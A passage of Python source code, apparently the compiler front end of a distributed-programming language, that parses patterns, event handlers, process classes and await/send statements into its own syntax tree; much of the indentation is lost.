return self.namescope.parent_scope
def visit(self, node):
if isinstance(node, Name):
return self.visit_Name(node)
elif isinstance(node, Tuple):
return self.visit_Tuple(node)
elif isinstance(node, List):
return self.visit_List(node)
# Parse general expressions:
self._parser.current_context = Read()
expr = self._parser.visit(node)
if isinstance(expr, dast.ConstantExpr):
return dast.ConstantPattern(self.parent_node, node, value=expr)
else:
return dast.BoundPattern(self.parent_node, node, value=expr)
def is_bound(self, name):
n = self.namescope.find_name(name)
if n is not None:
for r, _ in n.reads:
if r.is_child_of(self.current_query):
return True
return False
def visit_Name(self, node):
if self._parser.current_process is not None and \
node.id == KW_SELF:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.SelfExpr(self.parent_node, node))
elif node.id == KW_TRUE:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.TrueExpr(self.parent_node, node))
elif node.id == KW_FALSE:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.FalseExpr(self.parent_node, node))
elif node.id == KW_NULL:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.NoneExpr(self.parent_node, node))
elif self.literal:
name = node.id
n = self.outer_scope.find_name(name)
if n is None:
n = self.namescope.add_name(name)
pat = dast.BoundPattern(self.parent_node, node, value=n)
n.add_read(pat)
return pat
name = node.id
if name == "_":
# Wild card
return dast.FreePattern(self.parent_node, node)
elif name.startswith("_"):
# Bound variable:
name = node.id[1:]
n = self.outer_scope.find_name(name)
if n is None:
self._parser.warn(
("new variable '%s' introduced by bound pattern." % name),
node)
n = self.namescope.add_name(name)
pat = dast.BoundPattern(self.parent_node, node, value=n)
n.add_read(pat)
return pat
else:
# Could be free or bound:
name = node.id
if self.is_bound(name):
self._parser.debug("[PatternParser] reusing bound name " +
name, node)
n = self.namescope.find_name(name)
pat = dast.BoundPattern(self.parent_node, node, value=n)
n.add_read(pat)
else:
self._parser.debug("[PatternParser] free name " + name, node)
n = self.namescope.add_name(name)
pat = dast.FreePattern(self.parent_node, node, value=n)
n.add_assignment(pat)
return pat
def visit_Str(self, node):
return dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node, node, node.s))
def visit_Bytes(self, node):
return dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node, node, node.s))
def visit_Num(self, node):
return dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node, node, node.n))
def visit_Tuple(self, node):
return dast.TuplePattern(
self.parent_node, node,
value=[self.visit(e) for e in node.elts])
def visit_List(self, node):
return dast.ListPattern(
self.parent_node, node,
value=[self.visit(e) for e in node.elts])
def visit_Call(self, node):
if not self.use_object_style:
return self.generic_visit(node)
if not isinstance(node.func, Name): return None
elts = [dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node,
node.func,
value=node.func.id))]
for e in node.args:
elts.append(self.visit(e))
return dast.TuplePattern(self.parent_node, node,
value=elts)
class Pattern2Constant(NodeVisitor):
def __init__(self, parent):
super().__init__()
self.stack = [parent]
@property
def current_parent(self):
return self.stack[-1]
def visit_ConstantPattern(self, node):
expr = node.value.clone()
expr._parent = self.current_parent
return expr
visit_BoundPattern = visit_ConstantPattern
    def visit_TuplePattern(self, node):
        expr = dast.TupleExpr(self.current_parent)
        self.stack.append(expr)
        expr.subexprs = [self.visit(e) for e in node.value]
        self.stack.pop()
        return expr
    def visit_ListPattern(self, node):
        expr = dast.ListExpr(self.current_parent)
        self.stack.append(expr)
        expr.subexprs = [self.visit(e) for e in node.value]
        self.stack.pop()
        return expr
class PatternFinder(NodeVisitor):
def __init__(self):
self.found = False
# It's a pattern if it has bound variables:
def visit_Name(self, node):
if node.id.startswith("_"):
self.found = True
# It's also a pattern if it contains constants:
def visit_Constant(self, node):
self.found = True
visit_Num = visit_Constant
visit_Str = visit_Constant
visit_Bytes = visit_Constant
visit_NameConstant = visit_Constant
class Parser(NodeVisitor):
"""The main parser class.
"""
def __init__(self, filename="", options=None, execution_context=None):
# used in error messages:
self.filename = filename
# used to construct statement tree, also used for symbol table:
self.state_stack = []
# new statements are appended to this list:
self.current_block = None
self.current_context = None
self.current_label = None
self.current_query_scope = None
self.current_query = None
self.errcnt = 0
self.warncnt = 0
self.program = execution_context if execution_context is not None \
else dast.Program() # Just in case
self.full_event_pattern = (options.full_event_pattern
if hasattr(options,
'full_event_pattern')
else False)
self.use_object_style = (options.enable_object_pattern
if hasattr(options,
'enable_object_pattern')
else False)
self.enable_membertest_pattern = (options.enable_membertest_pattern
if hasattr(options,
'enable_membertest_pattern')
else False)
self.enable_iterator_pattern = (options.enable_iterator_pattern
if hasattr(options,
'enable_iterator_pattern')
else False)
def push_state(self, node):
self.state_stack.append((node,
self.current_context,
self.current_label,
self.current_query_scope,
self.current_block))
def pop_state(self):
(_,
self.current_context,
self.current_label,
self.current_query_scope,
self.current_block) = self.state_stack.pop()
    def is_in_setup(self):
        if self.current_process is None:
            return False
        elif isinstance(self.current_scope, dast.Function):
            return self.current_scope.name == "setup"
        else:
            return False
def enter_query(self):
if self.current_query_scope is None:
self.current_query_scope = dast.NameScope(self.current_scope)
self.current_query = self.current_parent
def leave_query(self, node=None):
if self.current_parent is self.current_query:
self.current_query = None
self.current_scope.parent_scope.merge_scope(self.current_query_scope)
if node is not None:
self.audit_query(self.current_parent, node)
@property
def current_parent(self):
return self.state_stack[-1][0]
@property
def current_process(self):
for node, _, _, _, _ in reversed(self.state_stack):
if isinstance(node, dast.Process):
return node
return None
@property
def current_scope(self):
if self.current_query_scope is not None:
return self.current_query_scope
for node, _, _, _, _ in reversed(self.state_stack):
if isinstance(node, dast.NameScope):
return node
return None
@property
def current_loop(self):
for node, _, _, _, _ in reversed(self.state_stack):
if isinstance(node, dast.ArgumentsContainer) or \
isinstance(node, dast.ClassStmt):
break
elif isinstance(node, dast.LoopStmt):
return node
return None
def visit_Module(self, node):
self.program = dast.Program(None, node)
# Populate global scope with Python builtins:
for name in PythonBuiltins:
self.program.add_name(name)
self.push_state(self.program)
self.current_block = self.program.body
self.current_context = Read()
self.body(node.body)
self.pop_state()
def visit_Interactive(self, node):
self.program = dast.InteractiveProgram(None, node)
# Populate global scope with Python builtins:
for name in PythonBuiltins:
self.program.add_name(name)
self.push_state(self.program)
contxtproc = dast.Process()
self.push_state(contxtproc)
# Helpers:
def parse_bases(self, node):
"""Scans a ClassDef's bases list and checks whether the class defined by
'node' is a DistProcess.
A DistProcess is a class whose bases contain the name $KW_PROCESS_DEF.
"""
isproc = False
bases = []
for b in node.bases:
if (isinstance(b, Name) and b.id == KW_PROCESS_DEF):
isproc = True
else:
bases.append(self.visit(b))
return isproc, bases
def parse_pattern_expr(self, node, literal=False):
expr = self.create_expr(dast.PatternExpr, node)
pp = PatternParser(self, literal)
pattern = pp.visit(node)
if pattern is None:
self.error("invalid pattern", node)
self.pop_state()
return None
expr.pattern = pattern
self.pop_state()
return expr
def parse_decorators(self, node):
assert hasattr(node, 'decorator_list')
labels = set()
notlabels = set()
decorators = []
for exp in node.decorator_list:
if isinstance(exp, Call) and exp.func.id == KW_DECORATOR_LABEL:
for arg in exp.args:
l, negated = self.parse_label_spec(arg)
if negated:
notlabels |= l
else:
labels |= l
else:
decorators.append(self.visit(exp))
return decorators, labels, notlabels
def parse_label_spec(self, expr):
negated = False
if (type(expr) is UnaryOp and
type(expr.operand) in {Set, Tuple, List}):
names = expr.operand.elts
negated = True
elif type(expr) in {Set, Tuple, List}:
names = expr.elts
else:
self.error("invalid label spec.", expr)
names = []
result = set()
for elt in names:
if type(elt) is not Name:
self.error("invalid label spec.", elt)
else:
result.add(elt.id)
return result, negated
def parse_event_handler(self, node):
if node.name == KW_RECV_EVENT:
eventtype = dast.ReceivedEvent
elif node.name == KW_SENT_EVENT:
eventtype = dast.SentEvent
else:
# Impossible
return None
extras = []
args = node.args
if len(args.defaults) < len(args.args):
extras.append(args.args[:(len(args.defaults) - len(args.args))])
args.args = args.args[(len(args.defaults) - len(args.args)):]
if args.vararg:
extras.append(args.vararg)
if args.kwonlyargs:
extras.append(args.kwonlyargs)
if args.kwarg:
extras.append(args.kwarg)
if len(extras) > 0:
for node in extras:
self.warn("extraneous arguments in event spec ignored.", node)
events = []
labels = set()
notlabels = set()
self.enter_query()
for key, patexpr in zip(args.args, args.defaults):
if key.arg == KW_EVENT_LABEL:
ls, neg = self.parse_label_spec(patexpr)
if neg:
notlabels |= ls
else:
labels |= ls
continue
pat = self.parse_pattern_expr(patexpr)
if key.arg == KW_MSG_PATTERN:
events.append(dast.Event(self.current_process, ast=node,
event_type=eventtype, pattern=pat))
continue
if len(events) == 0:
self.error("invalid event spec: missing 'msg' argument.", node)
# Add a phony event so we can recover as much as possible:
events.append(dast.Event(self.current_process))
if key.arg == KW_EVENT_SOURCE:
events[-1].sources.append(pat)
elif key.arg == KW_EVENT_DESTINATION:
events[-1].destinations.append(pat)
elif key.arg == KW_EVENT_TIMESTAMP:
events[-1].timestamps.append(pat)
else:
self.warn("unrecognized event parameter '%s'" % key.arg, node)
self.leave_query()
return events, labels, notlabels
def body(self, statements):
"""Process a block of statements.
"""
for stmt in statements:
self.current_context = Read()
self.visit(stmt)
if self.current_label is not None:
# Create a noop statement to hold the last label:
self.create_stmt(dast.NoopStmt, statements[-1])
def proc_body(self, statements):
"""Process the body of a process definition.
Process bodies differs from normal ClassDef bodies in that the names
defined in this scope are visible to the whole process.
"""
for stmt in statements:
if (isinstance(stmt, FunctionDef) and stmt.name not in
{KW_RECV_EVENT, KW_SENT_EVENT}):
self.debug("Adding function %s to process scope." % stmt.name,
stmt)
self.current_scope.add_name(stmt.name)
elif isinstance(stmt, ClassDef):
self.debug("Adding class %s to process scope." % stmt.name,
stmt)
self.current_scope.add_name(stmt.name)
elif isinstance(stmt, Assign):
for expr in stmt.targets:
if isinstance(expr, Name):
self.debug(
"Adding variable %s to process scope." % expr.id,
stmt)
self.current_scope.add_name(expr.id)
            elif isinstance(stmt, AugAssign):
                if isinstance(stmt.target, Name):
                    self.current_scope.add_name(stmt.target.id)
for stmt in statements:
self.visit(stmt)
if self.current_label is not None:
# Create a noop statement to hold the last label:
self.create_stmt(dast.NoopStmt, statements[-1])
def signature(self, node):
"""Process the argument lists."""
assert isinstance(self.current_parent, dast.ArgumentsContainer)
padding = len(node.args) - len(node.defaults)
container = self.current_parent.args
for arg in node.args[:padding]:
container.add_arg(arg.arg)
for arg, val in zip(node.args[padding:], node.defaults):
container.add_defaultarg(arg.arg, self.visit(val))
if node.vararg is not None:
# Python 3.4 compatibility:
if type(node.vararg) is str:
container.add_vararg(node.vararg)
else:
container.add_vararg(node.vararg.arg)
if node.kwarg is not None:
# Python 3.4 compatibility:
if type(node.kwarg) is str:
container.add_kwarg(node.kwarg)
else:
                container.add_kwarg(node.kwarg.arg)
for kwarg, val in zip(node.kwonlyargs, node.kw_defaults):
container.add_kwonlyarg(kwarg.arg, self.visit(val))
# Top-level blocks:
def visit_ClassDef(self, node):
isproc, bases = self.parse_bases(node)
if isproc:
if type(self.current_parent) is not dast.Program:
self.error("Process definition must be at top level.", node)
initfun = None
bodyidx = None
for idx, s in enumerate(node.body):
if is_setup_func(s):
if initfun is None:
initfun = s
bodyidx = idx
else:
self.error("Duplicate setup() definition.", s)
if initfun is None:
self.error("Process missing 'setup()' definition.", node)
return
n = self.current_scope.add_name(node.name)
proc = dast.Process(self.current_parent, node,
name=node.name, bases=bases)
n.add_assignment(proc)
proc.decorators, _, _ = self.parse_decorators(node)
self.push_state(proc)
self.program.processes.append(proc)
self.program.body.append(proc)
self.signature(initfun.args)
self.current_block = proc.body
# setup() has to be parsed first:
self.proc_body([node.body[bodyidx]] +
node.body[:bodyidx] + node.body[(bodyidx+1):])
proc.setup = proc.body[0]
self.pop_state()
else:
clsobj = dast.ClassStmt(self.current_parent, node,
name=node.name, bases=bases)
if self.current_block is None or self.current_parent is None:
self.error("Statement not allowed in this context.", ast)
else:
self.current_block.append(clsobj)
n = self.current_scope.add_name(node.name)
n.add_assignment(clsobj)
self.current_context = Read()
clsobj.decorators, _, _ = self.parse_decorators(node)
self.push_state(clsobj)
self.current_block = clsobj.body
self.body(node.body)
self.pop_state()
def visit_FunctionDef(self, node):
if (self.current_process is None or
node.name not in {KW_SENT_EVENT, KW_RECV_EVENT}):
# This is a normal method
n = self.current_scope.add_name(node.name)
s = self.create_stmt(dast.Function, node,
params={"name" : node.name})
n.add_assignment(s)
s.process = self.current_process
if type(s.parent) is dast.Process:
if s.name == "main":
self.current_process.entry_point = s
else:
self.current_process.methods.append(s)
elif (type(s.parent) is dast.Program and
s.name == "main"):
self.current_parent.entry_point = s
# Ignore the label decorators:
s.decorators, _, _ = self.parse_decorators(node)
self.current_block = s.body
self.signature(node.args)
self.body(node.body)
self.pop_state()
else:
# This is an event handler:
h = dast.EventHandler(self.current_parent, node)
# Parse decorators before adding h to node_stack, since decorators
# should belong to the outer scope:
h.decorators, h.labels, h.notlabels = self.parse_decorators(node)
self.push_state(h)
events, labels, notlabels = self.parse_event_handler(node)
events = self.current_process.add_events(events)
h.events = events
h.labels |= labels
h.notlabels |= notlabels
if len(h.labels) == 0:
h.labels = None
if len(h.notlabels) == 0:
h.notlabels = None
for evt in events:
evt.handlers.append(h)
for v in evt.freevars:
if v is not None:
self.debug("adding event argument %s" % v)
h.args.add_arg(v.name)
self.current_block = h.body
self.body(node.body)
self.pop_state()
def check_await(self, node):
if (isinstance(node, Call) and
isinstance(node.func, Name) and
node.func.id == KW_AWAIT):
if len(node.args) <= 2:
return True
else:
self.error("malformed await statement.", node)
return None
else:
return False
# Statements:
#
# The visit_* method for statements appends generated dast AST statements
# to self.current_block.
def create_stmt(self, stmtcls, ast, params=None, nopush=False):
"""Convenience method to instantiate a statement node and append to
'current_block'.
"""
if params is None:
stmtobj = stmtcls(parent=self.current_parent, ast=ast)
else:
stmtobj = stmtcls(parent=self.current_parent, ast=ast, **params)
stmtobj.label = self.current_label
self.current_label = None
if self.current_block is None or self.current_parent is None:
self.error("Statement not allowed in this context.", ast)
else:
self.current_block.append(stmtobj)
if not nopush:
self.push_state(stmtobj)
self.current_context = Read()
return stmtobj
def create_expr(self, exprcls, ast, params=None, nopush=False):
"""Convenience method to instantiate an expression node.
"""
if params is None:
expr = exprcls(self.current_parent, ast=ast)
else:
expr = exprcls(self.current_parent, ast=ast, **params)
if not nopush:
self.push_state(expr)
return expr
def visit_Assign(self, node):
stmtobj = self.create_stmt(dast.AssignmentStmt, node)
self.current_context = Read()
stmtobj.value = self.visit(node.value)
self.current_context = Assignment(stmtobj.value)
for target in node.targets:
stmtobj.targets.append(self.visit(target))
self.pop_state()
def visit_AugAssign(self, node):
stmtobj = self.create_stmt(dast.OpAssignmentStmt, node,
params={'op':OperatorMap[type(node.op)]})
self.current_context = Read()
valexpr = self.visit(node.value)
self.current_context = Assignment(valexpr)
tgtexpr = self.visit(node.target)
stmtobj.target = tgtexpr
stmtobj.value = valexpr
self.pop_state()
def visit_ImportFrom(self, node):
if type(self.current_parent) is not dast.Program:
self.error("'import' statement is only allowed at the top level.",
node)
return
stmtobj = self.create_stmt(dast.PythonStmt, node)
for alias in node.names:
if alias.asname is not None:
name = alias.asname
else:
name = alias.name
nobj = self.current_scope.add_name(name)
nobj.add_assignment(stmtobj)
self.pop_state()
visit_Import = visit_ImportFrom
    def expr_check(self, name, minargs, maxargs, node,
                   keywords=frozenset(), optional_keywords=frozenset()):
        if not (isinstance(node, Call) and
                isinstance(node.func, Name) and
                node.func.id == name):
            return False
        errmsg = None
        if minargs <= len(node.args) <= maxargs:
            if keywords is None:
                return True
            # Work on a copy so the caller's set (or the default) is never
            # mutated in place:
            keywords = set(keywords)
            for kw in node.keywords:
                if kw.arg in keywords:
                    keywords -= {kw.arg}
                elif kw.arg not in optional_keywords:
                    errmsg = "unrecognized keyword in %s statement." % name
                    break
            if errmsg is None:
                if len(keywords) > 0:
                    errmsg = ("missing required keywords: " +
                              ", ".join(keywords) +
                              " in " + name + " statement.")
                else:
                    return True
        else:
            errmsg = "Malformed %s statement." % name
        self.error(errmsg, node)
        raise MalformedStatementError
def kw_check(self, node, names):
if not isinstance(node, Name):
return False
if node.id not in names:
return False
return True
def parse_message(self, node):
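        # A message is either a plain tuple literal or, in object style, a
        # call such as Msg(a, b); the call form is normalized to a tuple
        # whose first element is the message name.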
expr = dast.TupleExpr(self.current_parent, node)
if type(node) is Call:
assert type(node.func) is Name
elem = dast.ConstantExpr(self.current_parent, node.func)
elem.value = node.func.id
expr.subexprs.append(elem)
elts = node.args
else:
elts = node.elts
for elt in elts:
expr.subexprs.append(self.visit(elt))
return expr
def visit_Expr(self, node):
l = extract_label(node.value)
if l is not None and self.current_process is not None:
self.current_label = l
return
stmtobj = None
try:
e = node.value
if self.expr_check(KW_AWAIT, 1, 2, e,
keywords={},
optional_keywords={KW_AWAIT_TIMEOUT}):
stmtobj = self.create_stmt(dast.AwaitStmt, node)
branch = dast.Branch(stmtobj, node,
condition=self.visit(e.args[0]))
stmtobj.branches.append(branch)
if len(e.args) == 2:
stmtobj.timeout = self.visit(e.args[1])
                if len(e.keywords) > 0:
                    if stmtobj.timeout is not None:
                        self.warn(
                            "duplicate timeout value in await statement.",
                            e)
                    stmtobj.timeout = self.visit(e.keywords[0].value)
elif self.expr_check(KW_SEND, 1, 1, e, keywords={KW_SEND_TO}):
stmtobj = self.create_stmt(dast.SendStmt, node)
stmtobj.message = self.parse_message(e.args[0])
stmtobj.target = self.visit(e.keywords[0].value)
elif self.expr_check(KW_BROADCAST, 1, 1, e, keywords={KW_SEND_TO}):
stmtobj = self.create_stmt(dast.SendStmt, node)
stmtobj.message = self.parse_message(e.args[0])
stmtobj.target = self.visit(e.keywords[0].value)
elif self.expr_check(KW_PRINT, 1, 2, e):
stmtobj = self.create_stmt(dast.OutputStmt, node)
stmtobj.message = self.visit(e.args[0])
if len(e.args) == 2:
stmtobj.level = self.visit(e.args[1])
elif self.current_process is not None and \
self.expr_check(KW_RESET, 0, 1, e):
stmtobj = self.create_stmt(dast.ResetStmt, node)
if len(e.args) > 0:
stmtobj.expr = self.visit(e.args[0])
if not isinstance(stmtobj.expr, dast.ConstantExpr):
self.error("Invalid argument in reset statement.", e)
elif stmtobj.expr.value not in ValidResetTypes:
self.error("Unknown argument in reset statement. "
"Valid arguments are: " +
str(ValidResetTypes), node)
elif (isinstance(self.current_parent, dast.Process) and
self.expr_check(KW_CONFIG, 0, 0, e, keywords=None)):
self.current_process.configurations.extend(
self.parse_config_section(e))
# 'yield' and 'yield from' should be statements, handle them here:
elif type(e) is Yield:
stmtobj = self.create_stmt(dast.YieldStmt, node)
stmtobj.expr = self.visit(e)
elif type(e) is YieldFrom:
# 'yield' should be a statement, handle it here:
stmtobj = self.create_stmt(dast.YieldFromStmt, node)
stmtobj.expr = self.visit(e)
else:
stmtobj = self.create_stmt(dast.SimpleStmt, node)
stmtobj.expr = self.visit(node.value)
except MalformedStatementError:
# already errored in expr_check so just ignore:
pass
finally:
if stmtobj is not None:
self.pop_state()
# ~~~
def visit_If(self, node):
stmtobj = None
try:
if self.expr_check(KW_AWAIT, 1, 1, node.test):
stmtobj = self.create_stmt(dast.AwaitStmt, node)
branch = dast.Branch(stmtobj, node.test,
condition=self.visit(node.test.args[0]))
self.current_block = branch.body
self.body(node.body)
stmtobj.branches.append(branch)
while True:
else_ = node.orelse
if len(else_) == 1 and isinstance(else_[0], If):
node = else_[0]
                        if self.expr_check(KW_AWAIT_TIMEOUT, 1, 1, node.test):
stmtobj.timeout = self.visit(node.test.args[0])
self.current_block = stmtobj.orelse
self.body(node.body)
if len(node.orelse) > 0:
self.error("timeout branch must be the last"
" branch of await statement", node)
else:
branch = dast.Branch(stmtobj, node,
condition=self.visit(node.test))
self.current_block = branch.body
self.body(node.body)
stmtobj.branches.append(branch)
elif len(else_) == 0:
break
else:
self.current_block = stmtobj.orelse
self.body(else_)
break
else:
stmtobj = self.create_stmt(dast.IfStmt, node)
stmtobj.condition = self.visit(node.test)
self.current_block = stmtobj.body
self.body(node.body)
self.current_block = stmtobj.elsebody
self.body(node.orelse)
except MalformedStatementError:
pass
finally:
if stmtobj is not None:
self.pop_state()
def visit_For(self, node):
s = self.create_stmt(dast.ForStmt, node)
self.current_context = Assignment()
s.domain = self.parse_domain_spec(node)
self.current_context = Read()
self.current_block = s.body
self.body(node.body)
self.current_block = s.elsebody
self.body(node.orelse)
self.pop_state()
def visit_While(self, node):
if self.expr_check(KW_AWAIT, 1, 2, node.test,
optional_keywords={KW_AWAIT_TIMEOUT}):
s = self.create_stmt(dast.LoopingAwaitStmt, node)
s.condition = self.visit(node.test.args[0])
if len(node.test.args) == 2:
s.timeout = self.visit(node.test.args[1])
else:
s = self.create_stmt(dast.WhileStmt, node)
s.condition = self.visit(node.test)
self.current_block = s.body
self.body(node.body)
if hasattr(s, "elsebody"):
self.current_block = s.elsebody
self.body(node.orelse)
self.pop_state()
def visit_With(self, node):
s = self.create_stmt(dast.WithStmt, node)
for item in node.items:
self.current_context = Read()
ctxexpr = self.visit(item.context_expr)
if item.optional_vars is not None:
self.current_context = Assignment(ctxexpr)
s.items.append((ctxexpr, self.visit(item.optional_vars)))
else:
s.items.append((ctxexpr, None))
self.current_context = Read()
self.current_block = s.body
self.body(node.body)
self.pop_state()
def visit_Pass(self, node):
self.create_stmt(dast.PassStmt, node, nopush=True)
def visit_Break(self, node):
loop = self.current_loop
if loop is None:
self.warn("Possible use of 'break' outside loop.", node)
self.create_stmt(dast.BreakStmt, node, nopush=True,
params={"loopstmt": loop})
def visit_Continue(self, node):
loop = self.current_loop
if loop is None:
self.warn("Possible use of 'continue' outside loop.", node)
self.create_stmt(dast.ContinueStmt, node, nopush=True,
params={"loopstmt": loop})
def visit_Delete(self, node):
s = self.create_stmt(dast.DeleteStmt, node)
self.current_context = Delete()
for target in node.targets:
s.targets.append(self.visit(target))
self.pop_state()
def visit_Try(self, node):
s = self.create_stmt(dast.TryStmt, node)
self.current_block = s.body
self.body(node.body)
self.current_context = Read()
for handler in node.handlers:
h = dast.ExceptHandler(s, handler)
            h.name = handler.name
            if h.name is not None:
                n = self.current_scope.find_name(h.name)
                if n is None:
                    n = self.current_scope.add_name(h.name)
                n.add_assignment(s)
if handler.type is not None:
h.type = self.visit(handler.type)
self.current_block = h.body
self.body(handler.body)
s.excepthandlers.append(h)
self.current_block = s.elsebody
self.body(node.orelse)
self.current_block = s.finalbody
self.body(node.finalbody)
self.pop_state()
def visit_Assert(self, node):
s = self.create_stmt(dast.AssertStmt, node)
s.expr = self.visit(node.test)
if node.msg is not None:
s.msg = self.visit(node.msg)
self.pop_state()
def visit_Global(self, node):
if self.current_process is not None:
self.warn("'global' statement inside process is redundant and "
"ignored.", node)
else:
self.create_stmt(dast.GlobalStmt, node,
{"names": list(node.names)})
for name in node.names:
localname = self.current_scope.find_name(name, local=True)
if localname is not None:
self.warn("name '%s' used before declared 'global'." %
name, node)
nobj = self.program.find_name(name)
if nobj is None:
nobj = self.program.add_name(name)
self.debug("Linking global name '%s'" % name)
self.current_scope.link_name(nobj)
self.pop_state()
def visit_Nonlocal(self, node):
self.create_stmt(dast.NonlocalStmt, node, {"names": list(node.names)})
if self.current_scope.parent_scope is None:
self.error("No nonlocal scope found.", node)
else:
for name in node.names:
nobj = self.current_scope.find_name(name, local=True)
if nobj is not None:
self.warn("Variable '%s' used before declared 'nonlocal'." %
name, node)
nobj = self.current_scope.parent_scope.find_name(name, local=False)
if nobj is None:
self.warn("Unable to determine scope for nonlocal var %s" %
name, node)
else:
self.debug("Linking nonlocal name '%s'" % name)
self.current_scope.link_name(nobj)
self.pop_state()
def visit_Return(self, node):
s = self.create_stmt(dast.ReturnStmt, node)
if node.value is not None:
s.value = self.visit(node.value)
self.pop_state()
def visit_Raise(self, node):
s = self.create_stmt(dast.RaiseStmt, node)
if node.exc is not None:
s.expr = self.visit(node.exc)
if node.cause is not None:
s.cause = self.visit(node.cause)
self.pop_state()
# Expressions:
#
# The visit_* methods for expressions return the newly
# constructed dast AST node
def visit_Attribute(self, node):
if (isinstance(self.current_context, FunCall) and
node.attr in KnownUpdateMethods):
# Calling a method that is known to update an object's state is an
# Update operation:
self.current_context = Update()
expr = self.create_expr(dast.AttributeExpr, node)
if type(self.current_context) is Assignment:
# Assigning to an attribute of an object updates that object:
self.current_context = Update()
expr.value = self.visit(node.value)
expr.attr = node.attr
self.pop_state()
if isinstance(expr.value, dast.SelfExpr):
# Need to update the namedvar object
n = self.current_process.find_name(expr.attr)
if n is None:
if (self.is_in_setup() and
isinstance(self.current_context, Assignment)):
self.debug("Adding name '%s' to process scope"
" from setup()." % expr.attr, node)
n = self.current_process.add_name(expr.attr)
n.add_assignment(expr)
n.set_scope(self.current_process)
else:
self.error("Undefined process state variable: " +
str(expr.attr), node)
else:
if isinstance(self.current_context, Assignment):
self.debug("Assignment to variable '%s'" % str(n), node)
n.add_assignment(expr)
elif isinstance(self.current_context, Update) or \
isinstance(self.current_context, Delete):
self.debug("Update to process variable '%s'" % str(n), node)
n.add_update(expr)
else:
n.add_read(expr)
return expr
def ensure_one_arg(self, name, node):
        nargs = len(node.args)
        if nargs != 1:
            self.error("'%s' takes exactly one argument (%d given)"
                       % (name, nargs), node)
            return False
        return True
def ensure_sequence_arg(self, name, node):
        nargs = len(node.args)
        if nargs > 1:
            self.error("'%s' takes zero or one argument (%d given)"
                       % (name, nargs), node)
            return False
        if nargs == 1 and not hasattr(node.args[0], "elts"):
            return False
return True
def parse_event_expr(self, node, literal=False):
if (node.starargs is not None or node.kwargs is not None):
self.warn("extraneous arguments in event expression.", node)
pattern = self.parse_pattern_expr(node.args[0], literal)
if node.func.id == KW_RECV_QUERY:
event = dast.Event(self.current_process,
event_type=dast.ReceivedEvent,
pattern=pattern)
elif node.func.id == KW_SENT_QUERY:
event = dast.Event(self.current_process,
event_type=dast.SentEvent,
pattern=pattern)
else:
self.error("unknown event specifier", node)
return None
for kw in node.keywords:
pat = self.parse_pattern_expr(kw.value, literal)
if kw.arg == KW_EVENT_SOURCE:
event.sources.append(pat)
elif kw.arg == KW_EVENT_DESTINATION:
event.destinations.append(pat)
elif kw.arg == KW_EVENT_TIMESTAMP:
event.timestamps.append(pat)
else:
self.warn("unknown keyword in query.", node)
return self.current_process.add_event(event)
def event_from_pattern(self, node, event_type):
assert isinstance(node, dast.PatternExpr)
pattern = node.pattern
assert isinstance(pattern, dast.TuplePattern)
event = dast.Event(self.current_process,
event_type=event_type)
if self.full_event_pattern:
if len(pattern.value) != 3:
self.error("malformed event pattern.", node)
else:
event.pattern = dast.PatternExpr(node.parent,
pattern=pattern.value[2])
envpat = pattern.value[1]
if isinstance(envpat, dast.TuplePattern):
if len(envpat.value) != 3:
self.warn("possible malformed envelope pattern.", node)
else:
event.timestamps.append(
dast.PatternExpr(node.parent,
pattern=envpat.value[0]))
event.destinations.append(
dast.PatternExpr(node.parent,
pattern=envpat.value[1]))
event.sources.append(
dast.PatternExpr(node.parent,
pattern=envpat.value[2]))
else:
if len(pattern.value) != 2:
self.error("malformed event pattern.", node)
else:
event.pattern = dast.PatternExpr(node.parent,
pattern=pattern.value[0])
event.sources.append(
dast.PatternExpr(node.parent, pattern=pattern.value[1]))
return self.current_process.add_event(event)
def pattern_from_event(self, node, literal=False):
if not isinstance(node, dast.Event):
return None
expr = self.create_expr(dast.PatternExpr if not literal else
dast.LiteralPatternExpr,
node.ast)
pattern = dast.TuplePattern(node.parent)
# Pattern structure:
# (TYPE, ENVELOPE, MESSAGE)
# ENVELOPE: (TIMESTAMP, DESTINATION, SOURCE)
if isinstance(node.type, dast.EventType):
pattern.value.append(
dast.ConstantPattern(
pattern,
value=self.current_scope.add_name(
node.type.__name__)))
else:
pattern.value.append(dast.FreePattern(pattern))
env = dast.TuplePattern(pattern)
if (len(node.timestamps) == 0):
env.value.append(dast.FreePattern(env))
elif len(node.timestamps) == 1:
env.value.append(node.timestamps[0].pattern.clone())
env.value[-1]._parent = env
else:
self.error("multiple timestamp spec in event pattern.", node)
if (len(node.destinations) == 0):
env.value.append(dast.FreePattern(env))
elif len(node.destinations) == 1:
env.value.append(node.destinations[0].pattern.clone())
env.value[-1]._parent = env
else:
self.error("multiple destination spec in event pattern.", node)
if (len(node.sources) == 0):
env.value.append(dast.FreePattern(env))
elif len(node.sources) == 1:
env.value.append(node.sources[0].pattern.clone())
env.value[-1]._parent = env
else:
self.error("multiple source spec in event pattern.", node)
pattern.value.append(env)
if node.pattern is None:
msgpat = dast.FreePattern(pattern)
else:
msgpat = node.pattern.pattern.clone()
msgpat._parent = pattern
pattern.value.append(msgpat)
expr.pattern = pattern
self.pop_state()
return expr
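    # For orientation, the full pattern built above has this shape (an
    # illustrative received-event pattern constrained only on its source;
    # '_' marks a FreePattern slot):
    #
    #   ('ReceivedEvent',       # TYPE: constant pattern naming the event type
    #    (_, _, SRC_PATTERN),   # ENVELOPE: (timestamp, destination, source)
    #    MSG_PATTERN)           # MESSAGE: free when the event had no pattern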
def call_check(self, names, minargs, maxargs, node):
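        # True iff `node` is a Call to one of `names` whose positional
        # argument count lies within [minargs, maxargs] (None disables a
        # bound); reports an error and returns False on an arity mismatch,
        # and returns False silently when the callee is not in `names`.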
if (isinstance(node.func, Name) and node.func.id in names):
if ((minargs is not None and len(node.args) < minargs) or
(maxargs is not None and len(node.args) > maxargs)):
self.error("Malformed %s expression." % node.func.id, node)
return False
else:
return True
return False
def parse_domain_spec(self, node):
if (self.current_process is not None and
isinstance(node, Call) and
self.call_check({KW_RECV_QUERY, KW_SENT_QUERY}, 1, 1, node)):
            # As shorthand, "sent" and "rcvd" can be used as a domain spec:
# some(rcvd(EVENT_PATTERN) | PRED) is semantically equivalent to
